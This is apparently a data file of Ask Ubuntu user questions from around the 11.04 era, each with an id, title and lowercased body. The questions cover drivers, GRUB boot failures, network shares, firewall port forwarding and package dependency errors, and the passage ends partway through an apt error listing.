55820	on startup , usb mouse needs re-plugging	does anyone know how to ensure that my mouse is recognized on startup ? i have to physically unplug and re-plug the mouse in order for it to work again . thanks .
55821	use a ppa , or use a package for a different ubuntu version ?	what are the advantages and disadvantages of using a ppa that 's designed for your version of ubuntu , versus using a `` normal '' package , but one designed for a different version of ubuntu ? background : we 'll soon be installing lucid lynx , and lucid 's ruby1.9.1 package is based on ruby 1.9.1-376 . there are ppas that have ruby 1.9.2 and are designed for lucid . and later releases of ubuntu have packages that are based on ruby 1.9.2 ( but the package is still called ruby 1.9.1 for perfectly logical reasons ) . what factors should i consider in deciding whether to use a ppa , or a package designed for a different ubuntu version ? ( i 'm not anticipating using rvm or installing from source , because we want admin to be as risk-free as possible )
55825	totem ( movie player ) quits on suspend	when i have a active window of movie player and suspend , then movie player quits . here is the setup : the window is seen on my screen . it does n't matter if the video is or is n't playing . it 's not a specific video or format . how can i make movie player stop quitting ? my laptop is an asus 1201n this is what happend when i played a movie , suspended , and when it woke up ( 10 seconds after ) the laptop froze . that 's why i had to take a picture with my iphone instead of a screenshot .
55827	does the gn-ws50g-rh wireless card work in ubuntu ?	alright so i 've given up with my rt3090bc4 wifi card , someone has offered me their old laptops chip to put in mine but their motherboard is fried so we ca n't boot and see if the chip works on a livecd . does anyone know if this chip works out of the box or whether i can download drivers for it if necessary ? i 've tried google and the forums but nothing ...
55830	root.disk not found after grub update ; maybe related to installing ubuntu on second hard drive wubi	for a few years i have been using wubi to install ubuntu on my machine . i have two hds on it . windows resides on the first drive , and i 've put ubuntu on the second one . however a recent update to grub ( that 's my best guess ) makes ubuntu unbootable . i can reproduce the following by : + installing the latest 10.04 ( since they updated it a few days ago ) + installing 11.04 + installing 10.10 and then , from within the system , install all updates provided let me describe the 10.10 route : i install the system , default settings , and booting in it works just find . here is the relevant information from grub.cfg : # # # begin /etc/grub.d/10_linux # # # # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/10_lupin # # # menuentry `` ubuntu , linux 2.6.35-22-generic '' { insmod part_msdos insmod ntfs set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set 46b2c65db2c650db loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) linux /boot/vmlinuz-2.6.35-22-generic root=/dev/sdb3 loop=/ubuntu/disks/root.disk ro quiet splash initrd /boot/initrd.img-2.6.35-22-generic } ... # # # begin /etc/grub.d/30_os-prober # # # menuentry `` windows 7 ( loader ) ( on /dev/sda2 ) '' { insmod part_msdos insmod ntfs set root= ' ( hd0 , msdos2 ) ' search -- no-floppy -- fs-uuid -- set b296c2ae96c27281 chainloader +1 } # # # end /etc/grub.d/30_os-prober # # # the grub version installed with 10.10 is 1.98+20100804-5ubuntu2 after updating the system ( not to 11.04 , but installing all updates recommended when running the update management tool for the first time ) , grub 's version is not 1.98+20100804-5ubuntu3.3 . grub.cfg looks similar to before , apart from the new kernel version and entries . it does add some code early in the file : ... insmod part_msdos insmod ntfs set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set 46b2c65db2c650db loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) ... . and here 's the new ubuntu entry : menuentry `` ubuntu , linux 2.6.35-30-generic '' { insmod part_msdos insmod ntfs set root= ' ( hd1 , msdos3 ) ' search -- no-floppy -- fs-uuid -- set 46b2c65db2c650db loopback loop0 /ubuntu/disks/root.disk set root= ( loop0 ) linux /boot/vmlinuz-2.6.35-30-generic root=uuid=46b2c65db2c650db loop=/ubuntu/disks/root.disk ro quiet splash initrd /boot/initrd.img-2.6.35-30-generic } upon boot , however , i get the dreaded `` alert ! /host/ubuntu/disks/root.disk does ont exist . dropping to a shell ! running `` ls '' at this shell reveals that /host points to my first drive , maybe it should be the second one . at first it sounded like the bug from https : //bugs.launchpad.net/ubuntu/lucid/+source/grub2/+bug/742967 , but since the page claims that 1.98+20100804-5ubuntu3.3 fixes this bug , maybe it has not been fixed for me ( or there is another reason for the error ) . any ideas or suggestions ?
55834	which dual-head video card ( s ) are guaranteed to work in twin view on 10.04 or 11.04 with minimal tinkering ?	after trying ( quite unsuccessfully ) to get a matrox g450 to work in twin view , i 've gone another direction and am shopping for new , compatible hardware . i have searched the threads and found the list of compatible video cards , but this requires that i determine the specifications of these cards . i 'm seeking instead a list of dual-head agp or pci video cards with vga out which are known to work in twin view , on 10.04 or 11.04 with little or no tinkering . thank you very much , all .
55837	my laptop randomly restarts , o.s or hardware ?	my laptop is an acer aspire 5630 , 5 yers old , running just ubuntu . in the last few days , it did restart randomly in middle of work . 2-3 times . and when it restarts , and arrive to the login screen , it restart itself again ... and then go normal for a while ... is it a hardware issue ? related maybe to the power stuff ? or is it the o.s ? or is it the kernel power issues ? ubuntu 11.04 , updated , kernel : 2.6.38-10 thanks in advance .
55838	ca n't install packages on kubuntu	i just installed kubuntu 11.04 and first it downloaded and installed packages fine but after a few time it cant download the packages and it says : '' connection has timed out '' i already tried to unplug and plug my moden but it didnt work do you have any ideas how to fix this ?
55839	none of my games are working in wine	okay , with the exception of starcraft i , every game i 've installed with with wine will not run ( i 've tried c & c 3 , worms armageddon , and rome total war ) . all the games install fine , but when i try to run them ( from the winefile ) , the screen flickers a bit ( like it 's trying to close out winefile ) and then stops . and when i exit out of the winefile it looks like it has reverted my version of ubuntu back to 10.08 ( i think , the one i currently have is 11.04 ) . this is driving my crazy , as i can not get any game ( with the exception of starcraft , and even then , the sound does n't work ) to work . does anyone know how to fix this ? thanks !
55847	xrandr not listing modes in xorg.conf	on my lenovo w520 , xorg/xrandr ( with intel driver ) detects the native resolution of my lcd panel , but does n't seem to detect any 16:9 intermediate resolutions : screen 0 : minimum 320 x 200 , current 1920 x 1080 , maximum 8192 x 8192 lvds1 connected 1920x1080+0+0 ( normal left inverted right x axis y axis ) 344mm x 193mm 1920x1080 60.0*+ 50.0 1400x1050 60.0 1280x1024 60.0 1280x960 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) the lcd panel is capable of displaying the following resolutions : 1920x1080 1600x900 1440x900 1400x1050 1366x768 1360x768 1280x1024 1280x960 1280x800 1280x768 1280x720 1024x768 960x540 800x600 640x480 so i ran x -configure and added those modes to /etc/x11/xorg.conf . after restarting xorg , xrandr does n't list the resolutions i added to xorg.conf . what could be the problem ? here is my xorg.conf : http : //pastebin.ubuntu.com/658761/ and my xorg.0.log : http : //pastebin.ubuntu.com/658764/ thanks in advance edit : for those who have a lenovo thinkpad w520 or t520 with a full hd screen , here 's the xorg.conf with all supported resolutions listed : http : //pastebin.ubuntu.com/659644/
55848	how do i install oracle java jdk 7 ?	if i downloaded the latest jdk from oracle , do i just download the .tar file and extract it to /usr/lib/jvm/ ?
55851	smbfs/cifs - ca n't navigate to paths with spaces	using ubuntu server 10.04 lts , i recently upgraded to the latest samba and smbfs via apt-get , and when i mount our windows share via smb , i 'm getting this kind of error : root @ orbital testsmb/test # mkdir `` spaces test '' root @ orbital testsmb/test # ll total 5 drwxr-xr-x 3 nobody nobody 0 aug 4 17:32 . drwxr-xr-x 37 nobody nobody 0 aug 4 17:24 .. drwxr-xr-x 0 nobody nobody 4096 aug 4 17:32 spaces test root @ orbital testsmb/test # cd spaces\ test/ dirname : extra operand `test' try `dirname -- help ' for more information . dirname : missing operand try `dirname -- help ' for more information . -su : [ : = : unary operator expected basename : missing operand try `basename -- help ' for more information . root @ orbital /spaces # pwd /home/testsmb/test/spaces test dirname : extra operand `test' try `dirname -- help ' for more information . dirname : missing operand try `dirname -- help ' for more information . -su : [ : = : unary operator expected basename : missing operand try `basename -- help ' for more information . even using quotes , single and double , do n't work : root @ orbital /spaces # cd .. root @ orbital testsmb/test # cd `` spaces test '' dirname : extra operand `test' try `dirname -- help ' for more information . dirname : missing operand try `dirname -- help ' for more information . -su : [ : = : unary operator expected basename : missing operand try `basename -- help ' for more information . root @ orbital /spaces # cd .. root @ orbital testsmb/test # cd 'spaces test' dirname : extra operand `test' try `dirname -- help ' for more information . dirname : missing operand try `dirname -- help ' for more information . -su : [ : = : unary operator expected basename : missing operand try `basename -- help ' for more information . here is my sanitized /etc/fstab : //192.168.xx.xx/winshare /home/testsmb smbfs rw , credentials=/etc/samba/winshare.creds , uid=nobody , gid=nobody , auto 0 0 none of this happens on local file systems . also an older suse box with an ancient smbfs does n't run into these problems .
55854	wireless works under gnome but not under kde on the same laptop	after browsing random old answered questions on this site i found the method to install kde plasma desktop 'on-top-of '' the standard ubuntu gnome desktop . ( i do n't think i 've worded that right : - ) ) my laptop worked 100 % ootb with ubuntu 11.04 and i have not had many problems with the hardware apart from issues with the battery montior so i am 100 % sure this is a software issue . as soon as i log into gnome my wireless connection activates , connects and sits in the background working fine however in kde is finds the ssid under the scan option in the network options but then will not connect to it or find it in the network option on the top of the screen . i am not at all apt with the kde system so i can not give you a log output or anything like that so as vague as this question may be i would love some help with this issue . gnome is using the broadcom sta driver
55859	is there a way to install nokia pc suite onto my netbook ?	i have a samsung n150 plus net book which works great with ubuntu , but ca n't use nokia 's pc suite application to keep my nokia e63 updated ? any ideas please ?
55861	where can i find the files i just installed from the software center ?	this is a rather basic question , when i install something from the ubuntu software center , i have to look around a bit to find it . for example , i just installed but i can not locate it . for some programs its obvious , for example dropbox and skype can be found in applications > internet > but for some others i am pretty clueless . i just switched from unity to gnome in ubuntu 11.04 , as it was a bit buggy . one thing i am beginning to miss though , is the search functionality which was quiet convenient .
55865	grub ca n't find raid partition in fresh install of 11.04	i attempted to install 11.04 on a dell poweredge-r610 that has a lsi sas1068e-based hardware raid setup ( i think ) . installer finishes without a hitch , but upon reboot , it appears that grub ca n't find the boot partition and drops to the busybox shell . here is the partition table on the raid device . disk /dev/sda : 72.7 gb , 72746008576 bytes 255 heads , 63 sectors/track , 8844 cylinders units = cylinders of 16065 * 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000d08d6 device boot start end blocks id system /dev/sda1 * 1 6757 54272000 83 linux /dev/sda2 6757 8845 16765953 5 extended /dev/sda5 6757 8845 16765952 82 linux swap / solaris and here is the grub script as produced by the installer . the msdos stuff looks fishy to me . ( please note , this was typed by hand and may contain typos . ) setparams 'ubuntu , with linux 2.6.38-8-generic' recordfail set gfxpayload= $ linux_gfx_mode insmod part_msdos insmod ext2 set root= ' ( /dev/sda , msdos1 ) ' search -- no-floppy -- fs-uuid -- set=root 22f9995f-8060-4893-9b9a-bed1d2635384 linux /boot/vmlinux-2.6.38-8-generic root=uuid=22f9995f-8060-4893-9b9a-bed1d2635384 ro quiet splash vt.handoff=7 initrd /boot/initrd.img-2.6.38-8-generic any thoughts on how to get this working ?
55866	ubuntu 11.04 launcher ... with tabs ?	in windows 7 , if you have more of the same window open at the same time and you click on the icon , it pops out a preview-list of all the windows . is there anyway to achieve the same thing in ubuntu 11.04 ? see below :
55868	installing broadcom wireless drivers	i 'm having serious problems installing the broadcom drivers for ubuntu . it worked perfectly on my previous version , but now , it is impossible . what are the steps to install broadcom wireless drivers for a bcm43xx card ? i 'm a user with no advance knowledge in linux , so i would need clear explanations on how to make , compile , etc . lspci -vnn | grep network showed : broadcom corporation bcm4322 802.11a/b/g/n wireless lan controller [ 14e4:432b ] iwconfig showed : lo no wireless extensions . eth0 no wireless extensions .
55871	installing ubuntu to and running from an external hd without live cd	i 've got a 2tb external hd just for personal use , with an 8gb primary fat32 partition ( i made it there from the beginning just in case i wanted to install ubuntu at a later moment ) now i could probably figure out how to set it up using a live cd , but unfortunately my dvd drive broke last week , and atm i do n't have access to a usb flash drive ( i might tomorrow , but it 's kinda time-bound ) yep , i am pretty much a ubuntu newbie .
55878	all desktop settings are messed after logout	i do some trivial modifications to my kde desktop such as changing wallpaper and adding a few widgets . after i logout and then login again all my modifications are lost . additionally , the panel is missing and no windows is displayed for the started applications ( only a rectangle of the window is shown when i pres alt-tab ) . after some experiments i discovered that i can get bring back the panel and windows if i play with activities , but it only lasts till the next logout . i have no idea how to approach this issue , so any ideas are greatly appreciated . thank you
55881	where could i find 64bit drivers for my brother mfc-7420 ?	is there any location where i can download the 64bit driver for my brother mfc-7420 laser- printer ? i 'm using ubuntu 11.04 since a few weeks . i searched many places and tried a lot of downloads , but nothing will work properly .
55883	how can i adjust internet settings such as ttl , rwin , and max connections ?	is it possible to adjust settings such as ttl , rwin , and max connections on ubuntu ? i am having connectivity issues on ubuntu with my wireless card . i experience the same issue on windows xp , at least until i change those settings using tcp optimizer . i figure if it works for windows , it may work for ubuntu as well
55886	ubuntu plugins ( gstreamer , freepats , etc ) deb archive ?	correct me if i 'm wrong ( i 'm still a newb , tried ubuntu last year ) , but i made a fresh install of natty . is there an ubuntu site where it has the *.deb files of restricted plugins ? i.e . gstreamer , freepats , and the like for a specific ubuntu distro . my net speed sucks most of the time , just for backups or something .
55892	how can i get video working properly on my shuttle ss30g2 ?	when i try to install ubuntu on my shuttle ss30g2 the video has vertical lines down it that show a different part of the screen . i 'm at my wits end how to fix it . i have a ss30g1 and it shows the same video corruption . the lspci output for the onboard video is : 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 661/741/760 pci/agp or 662/761gx pcie vga display adapter ( rev 04 ) ( prog-if 00 [ vga ] ) subsystem : holco enterprise co , ltd/shuttle computer unknown device 3079 flags : 66mhz , medium devsel , irq 5 bist result : 00 memory at d8000000 ( 32-bit , prefetchable ) [ size=128m ] memory at fdae0000 ( 32-bit , non-prefetchable ) [ size=128k ] i/o ports at cf00 [ size=128 ] capabilities : [ 40 ] power management version 2 capabilities : [ 50 ] agp version 3.0 the annoying thing is that with old versions of ubuntu/mythbuntu ( 6.06 , 6.10 ) the display works fine . i would use 6.06 but the partition manager wo n't work . with 7.04 or 7.10 ( do n't remember exactly ) the corruption starts and all versions up to 11.04 ( inclusive ) have corrupt video . any help you could give would be great !
55898	acting as though the laptop fn key is pressed	i have a fujitsu laptop and all was working fine until i ended teamviewer . on the keyboard it has a numberpad on some of the letters which you press the fn button to use . the system is acting like i have the fn key pressed and i get numbers shown when it should be letters . if i press the fn key the numbers go to letters . the fn key is not stuck down . is there a way to reset keyboard settings or a known fix . the operating system is ubuntu 11.04 natty .
55899	backup whole os	i am running ubuntu 11.04 . but now due to some or other reasons i have to format my entire disk and reinstall the ubuntu , but i have installed many softwares on natty . and when i 'll reinstall the ubuntu , i have to again reinstall all those updates , drivers and softwares too . so i want to ask is there any way so that i can make an .iso image of installed ubuntu along with all the softwares , preferences , drivers etc . existing in it ? is there any way so that i can back up my whole os along with all its softwares , drives , updates n all ?
55902	how can i migrate my folder-icons of nautilus , after a fresh install ?	i have set many folder icons into nautilus , in my desktop computer . i want to have the same icons in my notebook computer ( or any other computer runs ubuntu 11.04 ) . i have copy the folders from one computer to the other , but the folder-icons are not shown in my notebook . the names of folders and location of icons are exactly the same between two computers .
55903	how to share an internet connection over bluetooth from the phone to the pc	i am on vacation and have a phone ( n900 ) with an internet connection . i have no internet connection for my laptop . i 'd like to connect the phone and laptop over bluetooth ( second choice : per usb cable ) and share the connection with the laptop . i seem to remember that i was offered such a sharing the first time i connected the devices , but now i unpaired and paired them again and ca n't get this window to show again . any ideas how to set it up ? google only shows hits for the other way round ( the ubuntu pc has the internet ) . sorry if the question has been asked before , the search function does not work with the phone .
55904	how can i run my script automatically on ac switching	so , i wa n't to run it when start work on ac and this or better other script when start work from battery i tried /etc/acpi/power.sh adding symlink to /etc/laptop-mode/battery-start it seems to not working
55909	nfs really slow on one specific client	i have a fileserver in my network , with the storage accessible via nfs . from one particular client machine , reading from this nfs share is really slow . or rather , it stops all the time . the pattern goes like : copy really fast for like 2 seconds stop for approximately 18 seconds with no bits transferred ( this is what i want to get rid of ) repeat from 1 . it is not the server : i can access nfs quickly from several other machines in the network . it is not the network : see above . the one problematic machine is connected with a cable , so it 's all good . it is not the hardware in the problematic machine : i had ubuntu 11.04 x86 installed , and then nfs worked well . the problem has appeared after i installed ubuntu 11.04 x86-64 . ( i do n't know what causes it , but as i say ; it worked before . now it does n't ) it is not the mount options : i copied the relevant line in fstab from the x86-installation . i have also tried altering the mount options to no avail . i ca n't see anything relevant-looking in dmesg or syslog . i do n't really know how to continue debugging this . what can cause nfs to behave like this ? what tools can i use to determine what is causing the lock/stop ? help ? : )
55913	can you mount smb shares in kubuntu like in ubuntu ?	i have just installed kubuntu , and i notice that dolphin tries to access smb shares using libsmbclient instead of mounting an smb location like i am used to in nautilus . unfortunately , the performance is horrendous , and for some reason , i am unable to access shares that i could access in nautilus ( it gives me authorization issues which i did n't have in the smb mounts ) . is there a way to mount smb shares in kubuntu as in ubuntu ? ( note : i am accessing the share over a vpn , in case that makes a difference , but i do n't see why it should , and in nautilus the performance was completely accetable ) .
55918	set ufw before.rules without restart of server	i use ufw on my ubuntu server . unfortunately there are no rules in ufw to port forward to another machine . what you need to do is edit /etc/before.rules and put routing commands there , for example # nat table rules *nat : postrouting accept [ 0:0 ] # forward traffic from eth0 through eth1 . -a postrouting -s 192.168.0.0/24 -o eth1 -j masquerade -a prerouting -i eth1 -p tcp -- dport 80 -j dnat -- to 192.168.0.200:80 -a prerouting -i eth1 -p udp -- dport 10090 -j dnat -- to 192.168.0.202:22 -a prerouting -i eth1 -p tcp -- dport 10090 -j dnat -- to 192.168.0.202:22 -a prerouting -i eth1 -p tcp -- dport 443 -j dnat -- to 192.168.0.200:443 -a prerouting -i eth1 -p udp -- dport 443 -j dnat -- to 192.168.0.200:443 -a prerouting -i eth1 -p tcp -- dport 57626 -j dnat -- to 192.168.0.2:57626 -a prerouting -i eth1 -p udp -- dport 57626 -j dnat -- to 192.168.0.2:57626 -a prerouting -i eth1 -p tcp -- dport 3306 -j dnat -- to 192.168.0.200:3306 -a prerouting -i eth1 -p udp -- dport 3306 -j dnat -- to 192.168.0.200:3306 commit my problem is that i ca n't find a way to run new forwarding rules without restarting the server , which i hate to do very much . so please help me , is there a way ?
55920	how can i disable macbook screen when the lid is closed whilst continuing to use an external monitor ?	after getting ubuntu setup on my macbook pro with gnome shell , there is one little thing irritating me : i have an external monitor connected which is set as primary in the nvidia control panel . i 'd like that if the lid of the macbook is closed , the internal display is disabled completely , if it 's opened , it enables twinview . i 've found the configuration settings for lid closing in gnome tweak tool , but the best i can make it do is blank the screen , but that still means my desktop extends onto the macbook .
55924	where do i set socks5 proxy settings on a server ?	which software is used to setup connection to socks5 proxy from ubuntu server ?
55925	is there a way to add a common user menu to the unity launcher ?	having just upgraded from 10.04 to 11.04 , i 'm getting used to the unity interface . back in gnome , i managed to create a `` common '' menu accessible from the start button to which i could simply add *.desktop files to get all my common things in there ? is there a way to do this in unity ? what i 'm looking for is a single icon in the launcher which , when clicked , gives me a menu which can start my most common applications like : firefox . thunderbird . a couple of different vmware images . a couple of common directories ( nautilus file manager ) . a maximised terminal . my backup script . brasero , gcalctool , eclipse and others . the idea of putting all my apps in the launcher is not too appealing to me since it may expand beyond the screen height , even with my reduced icon size . by judicious use of the desktop files ( some standard , some self-made ) , i managed to get all this going in gnome but i 'm having troubles figuring out the new setup . in addition , the icons for all my vmware images are identical in the unity launcher whereas gnome allowed textual descriptions . can this be changed at the top level or , preferably , in the sub-menu i 'm looking for ?
55935	can not run java application from a shell script	after download and unzip the zip package , i copy the modelsphere.bat file to modelsphere.sh , and change the content to : java -ms64m -mx512m -ss16m -classpath `` ./modelsphere.jar : ./resources.zip : ./resources : ./targets : ./lib/jakarta-regexp-1.5/jakarta-regexp-1.5.jar : ./lib/velocity-1.6.1/velocity-1.6.1.jar : ./lib/jazzy-core/jazzy-core.jar : ./lib/jython-2.2.1/jython.jar : ./lib/velocity-1.6.1/lib/commons-collections-3.2.1.jar : ./lib/velocity-1.6.1/lib/commons-lang-2.4.jar : ./lib/lablib-checkboxtree-3.0.2.jar '' org.modelsphere.sms.application but when running the modelsphere.sh with the command `` ./modelsphere.sh '' , following exception is thrown : exception in thread `` main '' java.lang.noclassdeffounderror : org/modelsphere/sms/application caused by : java.lang.classnotfoundexception : org.modelsphere.sms.application at java.net.urlclassloader $ 1.run ( urlclassloader.java:202 ) at java.security.accesscontroller.doprivileged ( native method ) at java.net.urlclassloader.findclass ( urlclassloader.java:190 ) at java.lang.classloader.loadclass ( classloader.java:306 ) at sun.misc.launcher $ appclassloader.loadclass ( launcher.java:301 ) at java.lang.classloader.loadclass ( classloader.java:247 ) . program will exit.in class : org.modelsphere.sms.application when i run the command , java -ms64m -mx512m -ss16m -classpath `` ./modelsphere.jar : ./resources.zip : ./resources : ./targets : ./lib/jakarta-regexp-1.5/jakarta-regexp-1.5.jar : ./lib/velocity-1.6.1/velocity-1.6.1.jar : ./lib/jazzy-core/jazzy-core.jar : ./lib/jython-2.2.1/jython.jar : ./lib/velocity-1.6.1/lib/commons-collections-3.2.1.jar : ./lib/velocity-1.6.1/lib/commons-lang-2.4.jar : ./lib/lablib-checkboxtree-3.0.2.jar '' org.modelsphere.sms.application which is the content of the `` modelsphere.sh '' file , it works . why ? and how could i start open modelsphere with the shell file of `` modelsphere.sh '' ? could anyone give me any point ? thanks in advance .
55936	upgrading ubuntu from 9.10 to 10.04 lts	i tried to upgrade ubuntu 9.10 - everything was going well and good but then it stuck in downloading the package ttf-wqy-microhei_0.2.0-beta-1_all.deb . and then the upgrade terminated . i tried to download it from other sites but the case was the same . following are the sites which i used for downloading this package . site 1 site 2 can anyone help me with this ? thanks .
55940	what 's the standard way to provide configuration options for a daemon ?	i 'm in the process of writing a simple c-based daemon mostly for the learning experience . at this point , i 've got a working daemon and i 'd like to expose some configuration options to users . what 's the standard way that most daemons provide configuration options and are there any good c libraries that help with this ?
55946	gnome-file-share-properties does n't work	i 've configured gnome-file-share-properties on all my ubuntu 's pc for sharing the directory public to each other . i following some guide found on internet for the configuration of it , all explain the same procedure but in my case i do n't see any public directory shared with the pc . following this link http : //library.gnome.org/users/gnome-user-share/stable/gnome-user-share-getting-started.html.en i 'd see the directory public plus the name of pc that shares its directory on nautilus places . in my case i do n't see anything , therefore on the network place see all the machines 'n if i try to click on one receive this : '' dbus error org.freedesktop.dbus.error.noreply : message did not receive a reply ( timeout by message bus ) '' note : i do n't want to use samba because i 've all ubuntu pc , and the firewall is disabled on all pc .
55949	problem with defining own shortcut	i 'd like to have a shortcut to the system monitor like it 's in windows with ctrl + shift + escape . i read through internet and did it like it 's written , but it 's not working . does anybody know why it 's not working ? did i use wrong keywords ? using the gconf-editor : in app/metacity/global_keybindings : setting value in run_command_1 into < control > < shift > escape in keybinding_commands : setting value of command_1 into gnome-system-monitor .
55952	how to enable clutter view default ?	can anyone help to enable the clutter by default whenever i open folders ? it looks like i need to press f4 always to enable . any help would be greatly appreciated . mani
55954	how to run fsck with write capabilities on a sever with 4+ partitions	i wanted to know how to run the fsck command on a server with write capabilities . the command should run structurally from one hard disk partition to another without any user interaction .
55961	monitor goes into power saving mode after grub selection	i installed ubuntu server . it loads just fine to the grub selection screen but after making a selection , for some reason the monitor just goes into power saving mode and never wakes back up . i have to restart . the monitor cables are not loose or anything . is there a way to fix this ?
55964	why do i get a kernel panic if booting into ubuntu after having used windows 7 ?	a friend of mine has a dual-boot system with ubuntu and windows 7 . he encounters a kernel panic if he wants to boot up ubuntu after a windows session . this sounds pretty strange to me , however i actually witnessed the behavior . has anybody of you heard about this before ? any idea what the reason might be ?
55965	virtualbox networking configuration	here is the situation : i have a 11.04 desktop host running virtualbox 4.1 from the repositories . i would like to run a 10.04 server guest with complete lan and internet access . i 've followed the instructions here and here to no avail .
55968	add new hard drive to mirror existing lvm drive with raid1	i have a 320gb hard drive with an lvm2 volume group that was created as part of the default installation . if i put a second 320gb hard drive into the computer , can i make the second drive mirror the first using linux software raid1 or something similar ? i tried adding a new raid array in the gnome disk utility , but it only gave me the option of creating an array with two empty partitions .
55970	installed font on ubuntu , now ubuntu chrome , firefox , all browsers etc ... use that font ?	i installed a font called `` segoewp '' it 's made by microsoft and used in their wp7 devices . however , all webpages in every browser use this font even though their specified fonts in their options menu do not say segoewp or anything similar . i also went to change the font in system wide selection and it is n't displayed there either . how do i stop this ? : ( [ fix ] if you have a similar problem with a font you installed , follow these instructions : ~ install font manager from software center ~ open and go to `` user '' on the left ~ disable all offending fonts ~ open a terminal and run `` sudo apt-get update ''
55971	unable to create new launcher	i can not create a new launcher anywhere ( either in the normal gnome desktop or unity ) . no action when i right-click the desktop and select create launcher ... . at last i tried to create launcher , and i got the following error message : traceback ( most recent call last ) : file `` /usr/share/alacarte/alacarte/mainwindow.py '' , line 312 , in on_new_item_button_clicked process = subprocess.popen ( [ 'gnome-desktop-item-edit ' , file_path ] , env=os.environ ) file `` /usr/lib/python2.7/subprocess.py '' , line 672 , in __init__ errread , errwrite ) file `` /usr/lib/python2.7/subprocess.py '' , line 1213 , in _execute_child raise child_exception oserror : [ errno 2 ] directory or file does not exist . what is wrong ?
55973	how could i add an applications option to the left nautilus pane like finder on osx or pcmanfm ?	i recently noticed this option in pcmanfm , it works the same way as finder on osx , you click on the left pane on applications and then it opens a selection of categories , click again and the application itself will open . how , if possible can i add this functionality to nautilus ? .
55982	is the `` google music manager beta '' for linux open source ?	is the google music manager beta for linux considered an open source program ?
55984	full install ubuntu on 4gb usb drive	is there a way to full install ubuntu 11.04 in a 4gb usb drive ? it says that i need at least a 4.6 gb drive . i want the full install , not the live persistent installation . i think that it do n't need to use 4.6 gb , i just want a basic installation that is not like a live cd/persistent
55989	opensource driver with ati hd 6770	im currently using fglrx from amd and wan na try other driver to see if i can get better performance with compiz ( i 'm getting flickering ) . everything i 've tried dont works ( radeon , radeonhd ) , i think that 6770 is too new ; but wait ! 6770 is almost identical to 5770 ! any idea ? i have ubuntu 11.04 .
55992	running services	is there a way to get precise list of services with `` is running '' / '' is not running '' statuses specified . service -- status-all outputs more than 30 ? services . why is that output is so not informative ? is it that difficult to determine if service is running or not ? and how to get the exact statuses for all services ? zerkms @ ubuntu-server-11 : ~ $ sudo service -- status-all 2 > & 1|grep cron [ ? ] cron zerkms @ ubuntu-server-11 : ~ $ sudo service cron status cron start/running , process 804
55994	why does my indicator-weather sometimes turn gray ?	i am on ubuntu natty unity . i am facing a problem regarding indicator-weather indicator applet . sometimes , it does not work correctly and turns gray . please see following image if i click on refresh option then it works fine for 10-20 seconds and then again turns gray . for example , after refresh it will work for 10 seconds as shown in following image . i am using `` weather indicator 11.05.31 'cloudy 8 ' '' version of indicator-weather and i am using https : //launchpad.net/weather-indicator ppa to install this software . any pointers to solve this problem ?
55995	how do i stop banshee from automatically starting when i plug in my android device ?	i set banshee up as the default app to launch when i plug in my android device , but have changed my mind . i 'd prefer that ubuntu simply mount it as a drive and leave the rest to me . how would i go about changing this behavior ?
56001	firefox add-on gmail watcher sound problem	i 'm using a firefox extension called gmail watcher ( https : //addons.mozilla.org/en-us/firefox/addon/gmail-watcher/ ) for some reason it wo n't play a custom sound notification . i 've got it working on a mac and in pclinuxos , but for some reason ubuntu 11.04 wo n't play the .wav file that the extension needs . i tried to set up custom sound notification in thunderbird and it would n't work there either . both firefox and thunderbird will play the system sound . restricted extras are installed , sound works fine for everything except these email notifications . any ideas ? any one else having similar issues ? thanks
56003	what is the blue triangle on the home button for ?	i just noticed a blue triangle icon on my 'ubuntu ' icon . what could it mean ?
56004	create a keyboard shortcut to move windows to a specific screen edge	compizconfig settings manager in ubunte versions < 11.04 have the ability to create keyboard shortcuts that will send the currently active window to a specific screen location . e.g . i had my computer set up so that super + â sent the current window to the top-right corner of the current virtual desktop . so far i have managed to get everything set up the way that i like in natty without dealing with the chaos den that is the ccsm . in trying to fix this i have seen at least one guide that suggested that ctrl + alt + num 0 to num 9 will do what i want , which suggests that it is possible in a default install , but i 'm on a laptop and have no numpad . any ideas ?
56012	what package provides -llua for g++ ?	i 've installed all lua5.1 development packages from synaptic and the g++ linker can not find -llua . i 've read on some other question that it is possible that -llua has some other name and that i should fix it . but the problem is that i ca n't seem to find the lua.o or whatever it is called .
56015	gimp crashes on startup	first , i must say that i do not have ppa or any experimental packages enabled . just now i installed the gimp using kpackagekit . when i tried to start it using icon in the application menu , it did n't start . i tried running it from the terminal , and it said that it crashed with a segmentation fault . the question is : is there anything that i can do to install ( or reinstall it ) properly ? i am sure they would n't release it if it was crashing like that
56017	under what license can i use /usr/share/dict/words ?	there are a few dictionaries on my system , /usr/share/dict/words /usr/share/dict/american-english /usr/share/dict/british-english /usr/share/dict/ngerman ... and so on . how are these files licensed to me ? which project / package provides them ?
56018	getting issues after removal of gnome3	after removal of gnome-3 , i am not able to install any gnome applications like gedit , gnome-control-center , i am getting following error . how to solve this ? sunny @ sunny-travelmate-4740 : ~ $ sudo apt-get install gnome-control-center -f reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-control-center : depends : libappindicator1 ( > = 0.2.96 ) but it is not going to be installed depends : libatk1.0-0 ( > = 1.12.4 ) but it is not going to be installed depends : libcanberra-gtk0 ( > = 0.2 ) but it is not going to be installed depends : libdbus-glib-1-2 ( > = 0.78 ) but it is not going to be installed depends : libebook1.2-10 ( > = 2.32.2 ) but it is not going to be installed depends : libgconf2-4 ( > = 2.31.1 ) but it is not going to be installed depends : libgdk-pixbuf2.0-0 ( > = 2.22.0 ) but it is not going to be installed depends : libglib2.0-0 ( > = 2.24.0 ) but it is not going to be installed depends : libgnome-desktop-2-17 ( > = 1:2.29.92 ) but it is not going to be installed depends : libgnome-menu2 ( > = 2.27.92 ) but it is not going to be installed depends : libgnome-window-settings1 ( = 1:2.32.1-0ubuntu15 ) but it is not going to be installed depends : 